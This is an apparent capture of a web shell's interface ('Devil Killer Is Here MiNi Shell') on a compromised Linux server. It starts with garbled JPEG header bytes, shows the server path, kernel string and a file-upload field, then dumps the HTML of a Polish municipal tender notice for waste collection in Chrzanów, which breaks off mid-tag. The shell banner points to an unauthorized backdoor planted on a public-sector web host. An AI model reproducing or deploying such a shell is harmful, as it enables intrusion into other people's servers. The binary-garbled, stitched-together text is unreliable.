JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231129/0052192301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór odp. stałych pochodzących z Cm.Kom.w Chrzanowie, bud.przy ul. Garncarskiej 4 w Chrzanowie i bud. przy ul. Szymanowskiego 47A w Pogorzycach oraz z targowiska przy ul. Kusocińskiego w Chrz-wie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD ZASOBÓW KOMUNALNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120288979</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Garncarska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chrzanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzzk-zp@chrzanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mzzk.chrzanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór odp. stałych pochodzących z Cm.Kom.w Chrzanowie, bud.przy ul. Garncarskiej 4 w Chrzanowie i bud. przy ul. Szymanowskiego 47A w Pogorzycach oraz z targowiska przy ul. Kusocińskiego w Chrz-wie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f1ba520c-8ead-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00521923</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00016031/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Odbiór odpadów stałych z targowiska przy ul. Kusocińskiego w Chrzanowie</p> <p class="mb-0">1.3.6 Odbiór i wywóz nieczystości stałych z budynku przy ul. Garncarskiej 4 w Chrzanowie oraz z budynku Szymanowskiego 47a w Pogorzycach-sołtysówka</p> <p class="mb-0">1.3.7 Odbiór odpadów stałych z Cmentarza Komunalnego w Chrzanowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f1ba520c-8ead-11ee-b55a-a22b2d7f700e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy e-Zamówienia (https://ezamowienia.gov.pl/pl) oraz poczty elektronicznej.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. <br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta musi być sporządzona w języku polskim, w formie elektronicznej lub w postaci elektronicznej opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym pod rygorem nieważności.<br/>Oferta oraz wymagane formularze, oświadczenia składane wraz z ofertą wymagają podpisu osób uprawnionych do reprezentowania firmy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym oraz przepisami prawa. <br/>Oferta podpisana przez upoważnionego przedstawiciela Wykonawcy wymaga załączenia właściwego pełnomocnictwa lub umocowania prawnego. <br/>Do przygotowania oferty służy przygotowany formularz ofertowy, którego wzór stanowi załącznik nr 1a dla Zadania I, załącznik nr 1b dla Zadania II , załącznik nr 1c dla Zadania III. W treści oferty należy zamieścić wszystkie informacje wymagane w formularzu.<br/> Wypełniony Formularz ofertowy należy podpisać odpowiednim rodzajem podpisu elektronicznego tj. w formie elektronicznej lub w postaci elektronicznej.Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików. <br/> Wykonawca dodaje wybrany z dysku i uprzednio podpisany „Formularz oferty” w pierwszym polu („Wypełniony formularz oferty”). <br/>W kolejnym polu („Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”) wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z ofertą. <br/>.Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. Zarówno załącznik stanowiący tajemnicę przedsiębiorstwa jak i uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa należy dodać w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”. <br/> W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę” dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). W przypadku przekazywania dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <br/> System sprawdza, czy złożone pliki są podpisane i automatycznie je szyfruje, jednocześnie informując o tym wykonawcę. Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym Potwierdzeniu Przesłania (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO). EPP i EPO dostępne są dla zalogowanego Wykonawcy w zakładce „Oferty/Wnioski”. <br/> Oferta może być złożona tylko do upływu terminu składania ofert. <br/> Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji interaktywnej”, dostępnej na stronie: https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Oferty-3.2_20211016.pdf Wykonawca może przed upływem terminu składania ofert wycofać ofertę. Wykonawca wycofuje ofertę w zakładce „Oferty/wnioski” używając przycisku „Wycofaj ofertę”. Po potwierdzeniu oferta zostanie wycofana i będzie można pobrać dokument potwierdzający wycofanie oferty tzw. Elektroniczne Potwierdzenie Wycofania (EPW). <br/> Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty. <br/> Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB. . Dokumenty lub oświadczenia sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Miejski Zarząd Zasobów Komunalnych z siedzibą w Chrzanowie, pod adresem ul. Garncarska 4, 32-500 Chrzanów („Administrator”). <br/>Jeśli będzie Pani/Pan chciała/-ł skorzystać z praw, które zostały opisane poniżej lub uzyskać dodatkowe informacje, może Pani/Pan skontaktować się z Administratorem kierując korespondencję na adres: Miejski Zarząd Zasobów Komunalnych, ul. Garncarska 4, 32-500 Chrzanów lub na adres poczty elektronicznej: iodo-mzzk@chrzanow.pl<br/><br/>Administrator przetwarza Pani/Pana dane osobowe w celu:<br/>a)	zawarcia i realizacji umowy, w tym umowy gwarancji jakości (jeżeli została udzielona), <br/>b)	realizacji obowiązków wynikających z przepisów prawa, w tym wystawienia faktury VAT oraz wykonania obowiązków z rękojmi za wady;<br/>c)	ustalenia, dochodzenia lub obrony przed roszczeniami na wypadek sporu.<br/><br/>Podstawą prawną przetwarzania Pana/Pani danych osobowych są:<br/>a)przepisy prawa;<br/>b)umowa; <br/>c)wykonywanie zadań realizowanych w interesie publicznym.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/8/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje:<br/>Zadanie I- Przewidywana ilość odpadów do odbioru i zagospodarowania wynosi:<br/>- 900 m3 tj. 180 szt. pojemników na odpady mieszane o pojemności 5 m3,<br/>- 55 m3, tj. 50 szt. pojemników BIO o pojemności 1,1 m3<br/>- 55 m3, tj. 50 szt. pojemników na odpady mieszane o pojemności 1,1 m3<br/>- 69,12 m3, tj. 288 pojemników na odpady segregowane (szkło, plastik i papier) o pojemności 240 l<br/>Zamówienie usługi obejmuje:<br/>a. podstawienie 3 pojemników na odpady mieszane o pojemności 5m3 <br/>b. podstawienie 2 pojemników BIO o pojemności 1,1 m3<br/>c. podstawienie 2 pojemników na odpady mieszane o pojemności 1,1 m3<br/>d. podstawienie 12 pojemników na odpady segregowane ( szkło, plastik i papier) o pojemności 240 l<br/>e. dodatkowo 2 pojemników na odpady mieszane o pojemności 5 m3 w okresie przed i po święcie Wszystkich Świętych (termin uzgadniany z Zamawiającym)<br/>f. odbiór odpadów wg harmonogramu w tym:<br/>odpady mieszane- nie rzadziej niż raz w miesiącu, BIOodpady w okresie od kwietnia do października co 2 tygodnie w pozostałym okresie –nie rzadziej niż co 4 tygodnie, odpady segregowane nie rzadziej niż raz na 4 tygodnie.<br/>g. mycie pojemników w terminach uzgodnionych z Zamawiającym (zgodnie z ofertą Wykonawcy) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Usługa mycia pojemników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie II – Przewidywana ilość odpadów do odbioru i zagospodarowania wynosi:<br/>- 21,60 m3 tj. 90 szt. pojemników na odpady mieszane o pojemności 0,24 m3,<br/>- 0,48 m3 tj. 4 szt. pojemników na odpady mieszane o pojemności 0,12 m3,<br/>- 1,92 m3 tj. 16 szt. pojemników BIO o pojemności 0,12 m3,<br/> - 23,04 m3 tj. 192 szt. worków na odpady segregowane ( papier, szkło, plastik) o pojemności 0,12 m3<br/>Zamówienie obejmuje dla budynku przy ul. Garncarskiej 4 w Chrzanowie :<br/>a. podstawienie 1 pojemnika na odpady mieszane o pojemności 0,24 m3,<br/>b. podstawienie 1 pojemnika BIO o pojemności 0,12 m3 ,<br/>c. dostarczenie 180 szt. worków (rok) na odpady selektywne (papier, szkło, plastik) o pojemności 0,12 m3, <br/>d. wywóz odpadów mieszanych z pojemnika o pojemności 0,24 m3- 2 razy w tygodniu<br/>e. wywóz odpadów BIO z pojemnika o pojemności 0,12 m3- dwa raz w miesiącu w okresie kwiecień- listopad a w pozostałym okresie 1 raz w miesiącu,<br/>f. wywóz worków na segregację – jeden raz w miesiącu<br/>g. mycie pojemników w terminach uzgodnionych z Zamawiającym (zgodnie z ofertą Wykonawcy)<br/>Zamówienie obejmuje dla budynku przy ul. Szymanowskiego 47A w Pogorzycach:<br/>a. podstawienie 1 pojemnika zamykanego na odpady mieszane o pojemności 0,12 m3 <br/>b. podstawienie 1 pojemnika na BIO o pojemności 0,12 m3<br/>c. dostarczenie12 szt. worków (rok) na odpady selektywne (papier, plastik, szkło) o pojemności 0,12 m3 <br/>d. wywóz odpadów mieszanych z pojemnika o pojemności 0,12 m3- 1 razy na kwartał,<br/>e. wywóz odpadów BIO z pojemnika o pojemności 0,12 m3- 1 raz na kwartał,<br/>f. wywóz worków na segregację – 1 raz na kwartał. <br/>g. mycie pojemników w terminach uzgodnionych z Zamawiającym (zgodnie z ofertą Wykonawcy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Usługa mycia pojemników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie III - Przewidywana ilość odpadów do odbioru i zagospodarowania wynosi:<br/>- 66,00 m3, tj. 60 szt. pojemników na odpady mieszane o pojemności 1,1 m3,<br/>- 60,50 m3, tj. 55 szt. pojemników na odpady segregowane (makulatura) o pojemności 1,1 m3,<br/>- 3,60 m3, tj. 15 szt. pojemników BIO o pojemności 240 l<br/>- 2,40 m3, tj. 10 szt. pojemników na odpady segregowane - plastik o pojemności 240 l,<br/>- 1,20 m3, tj. 10 szt. pojemników na odpady segregowane – szkło o pojemności 120 l.<br/><br/>Zamówienie obejmuje:<br/>a. podstawienie 5 pojemników na odpady mieszane o pojemności 1,1 m3<br/>b. podstawienie 1 pojemnika BIO o pojemności 240 l,<br/>c. podstawienie 1 pojemnika na odpady segregowane ( plastik) o pojemności 240 l,<br/>d. podstawienie 1 pojemnika na odpady segregowane (szkło) o pojemności 120 l,<br/>e. postawienie 2 pojemników na odpady segregowane ( papier) o pojemności 1,1m3 .<br/>f. odbiór odpadów wg harmonogramu w tym:<br/>odpady mieszane- nie rzadziej niż raz w miesiącu, BIOodpady w okresie od kwietnia do października co 2 tygodnie w pozostałym okresie – nie rzadziej niż co 4 tygodnie, odpady segregowane nie rzadziej niż raz na 4 tygodnie. <br/>Zamawiający zobowiązany jest zapewnić personel w wymiarze czasu pracy zapewniającym prawidłową realizację umowy.<br/>g. mycie pojemników w terminach uzgodnionych z Zamawiającym (zgodnie z ofertą Wykonawcy) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Usługa mycia pojemników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 